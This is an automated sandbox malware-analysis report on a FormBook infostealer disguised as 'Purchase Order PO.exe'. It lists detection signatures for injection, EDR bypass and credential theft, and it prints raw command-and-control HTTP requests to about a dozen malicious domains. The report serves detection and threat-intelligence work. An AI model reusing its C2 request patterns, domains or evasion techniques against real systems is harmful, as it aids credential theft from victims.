Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order PO.exe

Overview

General Information

Sample name:Purchase Order PO.exe
Analysis ID:1560968
MD5:28d64b4cc91c016c93eb28e1f465efd2
SHA1:a627004d9e1217d7aa46650f6f7c4e4f085d446b
SHA256:98ffb783354435168540dc2e8eb4570f865f324169d553ffbad828bf9f33acd3
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase Order PO.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 28D64B4CC91C016C93EB28E1F465EFD2)
    • Purchase Order PO.exe (PID: 3732 cmdline: "C:\Users\user\Desktop\Purchase Order PO.exe" MD5: 28D64B4CC91C016C93EB28E1F465EFD2)
      • QfgdvbjddZ.exe (PID: 3872 cmdline: "C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 4476 cmdline: "C:\Windows\SysWOW64\isoburn.exe" MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • QfgdvbjddZ.exe (PID: 3104 cmdline: "C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1148 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            2.2.Purchase Order PO.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.Purchase Order PO.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Purchase Order PO.exeAvira: detected
                Source: Purchase Order PO.exeReversingLabs: Detection: 65%
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Purchase Order PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4172302652.0000000005670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4169256921.0000000002D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170584214.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4170538455.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2134871373.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4170384363.0000000002F20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2135061100.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Purchase Order PO.exeJoe Sandbox ML: detected
                Source: Purchase Order PO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Purchase Order PO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: isoburn.pdb source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: isoburn.pdbGCTL source: Purchase Order PO.exe, 00000002.00000002.2132616252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169823337.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QfgdvbjddZ.exe, 00000006.00000002.4169230923.000000000060E000.00000002.00000001.01000000.0000000C.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4169232027.000000000060E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Purchase Order PO.exe, Purchase Order PO.exe, 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2131525150.0000000004C74000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000007.00000003.2135458360.0000000004E29000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 7_2_02D2C4E0 FindFirstFileW,FindNextFileW,FindClose,7_2_02D2C4E0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 4x nop then jmp 0114483Fh0_2_01144668
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 4x nop then jmp 07468DFAh0_2_07468802
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then xor eax, eax7_2_02D19E40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 4x nop then mov ebx, 00000004h7_2_04DE04F8

                Networking

                barindex
                Source: DNS query: www.cyperla.xyz
                Source: DNS query: www.070002018.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:34 GMTserver: Apacheset-cookie: __tad=1732284754.2783085; expires=Mon, 20-Nov-2034 14:12:34 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:37 GMTserver: Apacheset-cookie: __tad=1732284757.5675792; expires=Mon, 20-Nov-2034 14:12:37 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Fri, 22 Nov 2024 14:12:40 GMTserver: Apacheset-cookie: __tad=1732284760.2043783; expires=Mon, 20-Nov-2034 14:12:40 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 34 9b 65 dc 04 93 d6 3d 88 92 b3 65 6b 64 3b f3 a7 38 bf cc 1c fa a1 a5 70 fe 00 61 3f 15 76 41 67 b0 93 9c 9f 10 d9 4e fb 50 ec 53 b5 1a 61 aa 45 f9 68 29 7d 76 37 3f 9d fe 5f bb 42 99 91 10 74 1f 81 b1 aa 49 d1 b9 b1 e3 7f 7f 87 b1 ab 2f 47 8e 0e 3c c5 70 67 2b 6e 34 04 ec da d9 c1 54 cb b3 cb c5 a5 ba ba 86 23 30 7a 04 31 6d ba 0c 23 fa 6e ad 6c 6b 9d 88 cf ea 71 c5 10 26 96 b7 8b 71 f1 bc 16 95 de c1 c8 15 49 a5 3d ab 3f 2c c1 58 83 ab a4 2c 24 34 0e 6b f1 cf f9 0d 93 70 95 94 1f 5a ad b6 d0 a0 c3 71 50 0d a1 2b 72 c9 17 87 f3 73 15 63 27 37 45 87 c4 69 39 e1 05 fe 1c f4 4e c4 5c 81 3b df c4 c0 03 44 4c 14 f1 62 05 df 6f be 88 d7 aa be 0d f7 f2 29 31 3b 0f 96 c7 0e 84 bf c2 2f 48 65 37 98 1c 04 00 00 Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7
                Source: global trafficHTTP traffic detected: GET /qygv/?o6=SpTPojpx7H&Mr60=PNgLNtFNavTWVACgmh5xCzkhObl4Vn/3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4Wmu6EeWsOoRA0CokgLA8hMNXivrFO8nzFLsU= HTTP/1.1Host: www.cyperla.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qx5d/?Mr60=IyUQrkKyuirfHSYuUsN1+y7QK+I5LuF7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvprNVphaqp6upu86OQyU68aVNw4H3NL9j/8=&o6=SpTPojpx7H HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6ou6/?o6=SpTPojpx7H&Mr60=We72k2U8RqyHNx9ftVgFe72GQMu4iuXnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5WHt4/FI7OJ+yOIhAl7/LaOCHNokGW9xZfY= HTTP/1.1Host: www.madhf.techAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /v89f/?Mr60=vR3kWP+v98PFeIQUj3bnjAJ1ckGUCiAryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2Lg1hTzUbXWqWgu/JIX+7IudMx93vwrkJY0=&o6=SpTPojpx7H HTTP/1.1Host: www.bser101pp.buzzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8m07/?o6=SpTPojpx7H&Mr60=2dHIoPS/8uSmn0UTpxXBmuXgzQfGtnFv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrQZLN2Jh+RnltKoXALFEyxyCbEquQJUaCWgU= HTTP/1.1Host: www.goldstarfootwear.shopAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6m2n/?Mr60=Yw5byyKwEzNx0WExUgXfy9WYeOrLRKTUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0orZ4vi8yKWUq5FVUlLJ03fvmQMl+mrBpOPM=&o6=SpTPojpx7H HTTP/1.1Host: www.070002018.xyzAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7yhf/?Mr60=OF4p1YkyIdfCe7eI49mlQK2eqaOY0Xp5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGru88xTxROuotR+L2zC6/y25G8bNDJ7z2wjg0=&o6=SpTPojpx7H HTTP/1.1Host: www.bienmaigrir.infoAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wu7k/?Mr60=msE8We8dGqsfRntVyauP2sAWp39/EoG83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP4o7T3EWu90E9kOVVHAZEZpi4QiZXp0u9yLs=&o6=SpTPojpx7H HTTP/1.1Host: www.yc791022.asiaAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ykgd/?Mr60=9oLAy+SEg8JXgI2QYoJQeX3wYK8lZLg7WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/2tLKee7xpwwT0pkaI3y+yn0sIY/GpO9ikGE=&o6=SpTPojpx7H HTTP/1.1Host: www.jalan2.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fbpt/?Mr60=sHQWWiJRbY7Czg+qExT5lhETHbNnMxamWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw7URZvJro+8N+ASp2jrUizWujex2cueM/JZ0=&o6=SpTPojpx7H HTTP/1.1Host: www.beyondfitness.liveAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dm4p/?o6=SpTPojpx7H&Mr60=nAmjXBwFyC120iWGDF5QEkfQ4V9pq4qW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4A1F2MgfpbEGtSAoSHmNs0Z+rY9P6APqFlZ34= HTTP/1.1Host: www.dietcoffee.onlineAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qtfx/?Mr60=KdNk/QG/ntQJ0Ylt7Lyc3znBwC3jfRDsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLMlSLf1n7d0xHEmolRusqu1Y7m0apztprjxI=&o6=SpTPojpx7H HTTP/1.1Host: www.smartcongress.netAccept: */*Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.cyperla.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cstrategy.online
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.bser101pp.buzz
                Source: global trafficDNS traffic detected: DNS query: www.goldstarfootwear.shop
                Source: global trafficDNS traffic detected: DNS query: www.070002018.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bienmaigrir.info
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.beyondfitness.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.alihones.lol
                Source: unknownHTTP traffic detected: POST /qx5d/ HTTP/1.1Host: www.cstrategy.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.cstrategy.onlineContent-Length: 201Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.cstrategy.online/qx5d/User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36Data Raw: 4d 72 36 30 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 7a 70 61 55 79 77 37 7a 6d 43 51 4b 68 4c 6d 35 4e 32 31 4b 6a 32 2f 5a 45 39 71 6c 4e 6c 49 5a 51 3d 3d Data Ascii: 